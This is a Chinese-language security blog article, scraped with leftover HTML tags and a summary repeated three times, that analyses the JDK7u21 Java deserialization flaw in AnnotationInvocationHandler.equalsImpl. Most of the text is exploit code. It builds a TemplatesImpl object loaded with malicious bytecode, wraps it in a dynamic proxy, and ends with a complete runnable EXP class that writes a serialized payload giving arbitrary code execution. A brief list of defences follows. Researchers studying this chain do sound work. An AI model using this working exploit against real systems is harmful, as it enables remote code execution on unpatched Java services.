JDK7u21反序列化漏洞深入分析与利用<\/h1>

漏洞概述<\/h2>
JDK7u21反序列化漏洞是Java 7u21及之前版本中存在的一个高危漏洞，允许攻击者通过精心构造的序列化数据在目标系统上执行任意代码。该漏洞的核心在于`sun.reflect.annotation.AnnotationInvocationHandler<\/code>类的equalsImpl<\/code>方法中的不安全反射调用。<\/p>`

漏洞核心分析<\/h2>
AnnotationInvocationHandler.equalsImpl方法<\/h3>
漏洞的核心在于sun.reflect.annotation.AnnotationInvocationHandler<\/code>类的equalsImpl<\/code>方法：<\/p>
private<\/span> Boolean equalsImpl<\/span>(<\/span>Object var1)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>var1 ==<\/span> this<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> if<\/span> (!<\/span>this<\/span>.<\/span>type<\/span>.<\/span>isInstance<\/span>(<\/span>var1))<\/span> {<\/span>
<\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        Method[]<\/span> var2 =<\/span> this<\/span>.<\/span>getMemberMethods<\/span>();<\/span>
<\/span><\/span>        int<\/span> var3 =<\/span> var2.<\/span>length<\/span>;<\/span>
<\/span><\/span>        for<\/span>(<\/span>int<\/span> var4 =<\/span> 0<\/span>;<\/span> var4 <<\/span> var3;<\/span> ++<\/span>var4)<\/span> {<\/span>
<\/span><\/span>            Method var5 =<\/span> var2[<\/span>var4];<\/span>
<\/span><\/span>            String var6 =<\/span> var5.<\/span>getName<\/span>();<\/span>
<\/span><\/span>            Object var7 =<\/span> this<\/span>.<\/span>memberValues<\/span>.<\/span>get<\/span>(<\/span>var6);<\/span>
<\/span><\/span>            Object var8 =<\/span> null<\/span>;<\/span>
<\/span><\/span>            AnnotationInvocationHandler var9 =<\/span> this<\/span>.<\/span>asOneOfUs<\/span>(<\/span>var1);<\/span>
<\/span><\/span>            if<\/span> (<\/span>var9 !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                var8 =<\/span> var9.<\/span>memberValues<\/span>.<\/span>get<\/span>(<\/span>var6);<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    var8 =<\/span> var5.<\/span>invoke<\/span>(<\/span>var1);<\/span>  \/\/ 关键漏洞点
<\/span><\/span><\/span><\/span>                }<\/span> catch<\/span> (<\/span>InvocationTargetException var11)<\/span> {<\/span>
<\/span><\/span>                    return<\/span> false<\/span>;<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>IllegalAccessException var12)<\/span> {<\/span>
<\/span><\/span>                    throw<\/span> new<\/span> AssertionError(<\/span>var12);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            if<\/span> (!<\/span>memberValueEquals(<\/span>var7,<\/span> var8))<\/span> {<\/span>
<\/span><\/span>                return<\/span> false<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点在于var5.invoke(var1)<\/code>这行代码，它通过反射调用了传入对象的方法。<\/p>
getMemberMethods方法<\/h3>
equalsImpl<\/code>方法中调用的getMemberMethods()<\/code>方法实现如下：<\/p>
private<\/span> Method[]<\/span> getMemberMethods<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>memberMethods<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>memberMethods<\/span> =<\/span> (<\/span>Method[])<\/span>AccessController.<\/span>doPrivileged<\/span>(<\/span>new<\/span> PrivilegedAction<<\/span>Method[]>()<\/span> {<\/span>
<\/span><\/span>            public<\/span> Method[]<\/span> run<\/span>()<\/span> {<\/span>
<\/span><\/span>                Method[]<\/span> var1 =<\/span> AnnotationInvocationHandler.<\/span>this<\/span>.<\/span>type<\/span>.<\/span>getDeclaredMethods<\/span>();<\/span>
<\/span><\/span>                AccessibleObject.<\/span>setAccessible<\/span>(<\/span>var1,<\/span> true<\/span>);<\/span>
<\/span><\/span>                return<\/span> var1;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>memberMethods<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该方法会获取当前type<\/code>属性的所有声明方法，并将其设置为可访问。<\/p>
利用链构造<\/h2>
利用TemplatesImpl链<\/h3>
对于Java自带的类，可以利用TemplatesImpl<\/code>链。如果type<\/code>中仅有触发TemplatesImpl<\/code>链的方法，就可以通过equalsImpl<\/code>函数的反射调用触发TemplatesImpl<\/code>链。<\/p>
Templates<\/code>接口类的两个方法newTransformer<\/code>和getOutputProperties<\/code>都可以作为TemplatesImpl<\/code>链的触发方法。<\/p>
通过动态代理调用equalsImpl<\/h3>
equalsImpl<\/code>是私有方法，不能直接调用，但可以通过AnnotationInvocationHandler<\/code>的唯一公共方法invoke<\/code>来间接调用：<\/p>
public<\/span> Object invoke<\/span>(<\/span>Object var1,<\/span> Method var2,<\/span> Object[]<\/span> var3)<\/span> {<\/span>
<\/span><\/span>    String var4 =<\/span> var2.<\/span>getName<\/span>();<\/span>
<\/span><\/span>    Class[]<\/span> var5 =<\/span> var2.<\/span>getParameterTypes<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>var4.<\/span>equals<\/span>(<\/span>"equals"<\/span>)<\/span> &&<\/span> var5.<\/span>length<\/span> ==<\/span> 1<\/span> &&<\/span> var5[<\/span>0<\/span>]<\/span> ==<\/span> Object.<\/span>class<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>equalsImpl<\/span>(<\/span>var3[<\/span>0<\/span>]);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他代码...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>要触发invoke<\/code>方法，可以构造一个动态代理Proxy<\/code>，通过调用代理的equals<\/code>方法来触发invoke<\/code>。<\/p>
完整利用步骤<\/h2>
1. 构造恶意TemplatesImpl类<\/h3>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>byte<\/span>[]<\/span> evil =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"恶意类路径"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> evilcode =<\/span> {<\/span>evil};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置_name字段
<\/span><\/span><\/span><\/span>Field name =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>name.<\/span>set<\/span>(<\/span>templates,<\/span>"任意名称"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置_bytecodes字段
<\/span><\/span><\/span><\/span>Field bytecodes =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span>evilcode);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置_tfactory字段
<\/span><\/span><\/span><\/span>Field tfactory =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>tfactory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>tfactory.<\/span>set<\/span>(<\/span>templates,<\/span>new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：恶意类需要实现AbstractTranslet<\/code>接口，因为在TemplatesImpl#defineTransletClasses<\/code>方法中会检查：<\/p>
_class[<\/span>i]<\/span> =<\/span> loader.<\/span>defineClass<\/span>(<\/span>_bytecodes[<\/span>i]);<\/span>
<\/span><\/span>final<\/span> Class superClass =<\/span> _class[<\/span>i].<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>if<\/span> (<\/span>superClass.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>ABSTRACT_TRANSLET))<\/span> {<\/span>
<\/span><\/span>    _transletIndex =<\/span> i;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 创建AnnotationInvocationHandler代理<\/h3>
Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor declaredConstructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>declaredConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建初始HashMap，用一个字符串占位
<\/span><\/span><\/span><\/span>HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"f5a5a608"<\/span>,<\/span>"占位值"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用Templates.class作为第一个参数
<\/span><\/span><\/span><\/span>Object o =<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Templates.<\/span>class<\/span>,<\/span>hashMap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建动态代理
<\/span><\/span><\/span><\/span>Map ProxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    (<\/span>InvocationHandler)<\/span> o
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 将占位的value替换为templates
<\/span><\/span><\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"f5a5a608"<\/span>,<\/span>templates);<\/span>
<\/span><\/span><\/code><\/pre>3. 构造触发HashMap<\/h3>
为了使ProxyMap.hashCode()<\/code>和templates.hashCode()<\/code>相等，需要满足：<\/p>

memberValues<\/code>中只有一个键值对<\/li>
键的hashCode<\/code>等于0<\/li>
值为templates<\/code>对象<\/li>
<\/ol>
HashMap evilmap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>evilmap.<\/span>put<\/span>(<\/span>ProxyMap,<\/span>null<\/span>);<\/span>
<\/span><\/span>evilmap.<\/span>put<\/span>(<\/span>templates,<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4. 序列化与反序列化触发<\/h3>
\/\/ 序列化
<\/span><\/span><\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>evilmap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化触发
<\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>Object obj =<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>替代触发方式<\/h2>
除了直接调用HashMap.put<\/code>方法，还可以通过反射调用HashMap#putForCreate<\/code>方法：<\/p>
Method putForCreate =<\/span> HashMap.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"putForCreate"<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>putForCreate.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>putForCreate.<\/span>invoke<\/span>(<\/span>evilmap,<\/span>templates,<\/span>null<\/span>);<\/span>
<\/span><\/span>putForCreate.<\/span>invoke<\/span>(<\/span>evilmap,<\/span>ProxyMap,<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>这种方式在HashMap#readObject<\/code>函数中被调用，因此可以直接通过反序列化触发。<\/p>
完整EXP示例<\/h2>
import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> javax.xml.transform.Templates;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> EXP<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 构造恶意TemplatesImpl类
<\/span><\/span><\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> evil =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"恶意类路径"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> evilcode =<\/span> {<\/span>evil};<\/span>
<\/span><\/span>        
<\/span><\/span>        Field name =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>        name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        name.<\/span>set<\/span>(<\/span>templates,<\/span>"任意名称"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field bytecodes =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>        bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span>evilcode);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field tfactory =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>        tfactory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        tfactory.<\/span>set<\/span>(<\/span>templates,<\/span>new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 创建AnnotationInvocationHandler代理
<\/span><\/span><\/span><\/span>        Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor declaredConstructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        declaredConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>"f5a5a608"<\/span>,<\/span>"占位值"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Object o =<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Templates.<\/span>class<\/span>,<\/span>hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        Map ProxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>            ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            (<\/span>InvocationHandler)<\/span> o
<\/span><\/span>        );<\/span>
<\/span><\/span>        
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>"f5a5a608"<\/span>,<\/span>templates);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造触发HashMap
<\/span><\/span><\/span><\/span>        HashMap evilmap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        evilmap.<\/span>put<\/span>(<\/span>ProxyMap,<\/span>null<\/span>);<\/span>
<\/span><\/span>        evilmap.<\/span>put<\/span>(<\/span>templates,<\/span>null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化与触发
<\/span><\/span><\/span><\/span>        serialize(<\/span>evilmap);<\/span>
<\/span><\/span>        deserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Object deserialize<\/span>(<\/span>String Filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>Filename));<\/span>
<\/span><\/span>        return<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级JDK到7u21之后的版本<\/li>
对反序列化操作进行严格限制<\/li>
使用安全管理器限制危险操作<\/li>
使用白名单机制控制可反序列化的类<\/li>
<\/ol>
总结<\/h2>
JDK7u21反序列化漏洞通过精心构造的序列化数据，利用AnnotationInvocationHandler<\/code>和TemplatesImpl<\/code>的反射机制，实现了任意代码执行。理解该漏洞的利用链和触发机制对于防御类似漏洞具有重要意义。<\/p>
JDK7u21反序列化漏洞深入分析与利用<\/h1>

总结<\/h2> JDK7u21反序列化漏洞通过精心构造的序列化数据，利用AnnotationInvocationHandler<\/code>和TemplatesImpl<\/code>的反射机制，实现了任意代码执行。理解该漏洞的利用链和触发机制对于防御类似漏洞具有重要意义。<\/p>

总结<\/h2>
JDK7u21反序列化漏洞通过精心构造的序列化数据，利用`AnnotationInvocationHandler<\/code>和TemplatesImpl<\/code>的反射机制，实现了任意代码执行。理解该漏洞的利用链和触发机制对于防御类似漏洞具有重要意义。<\/p>`
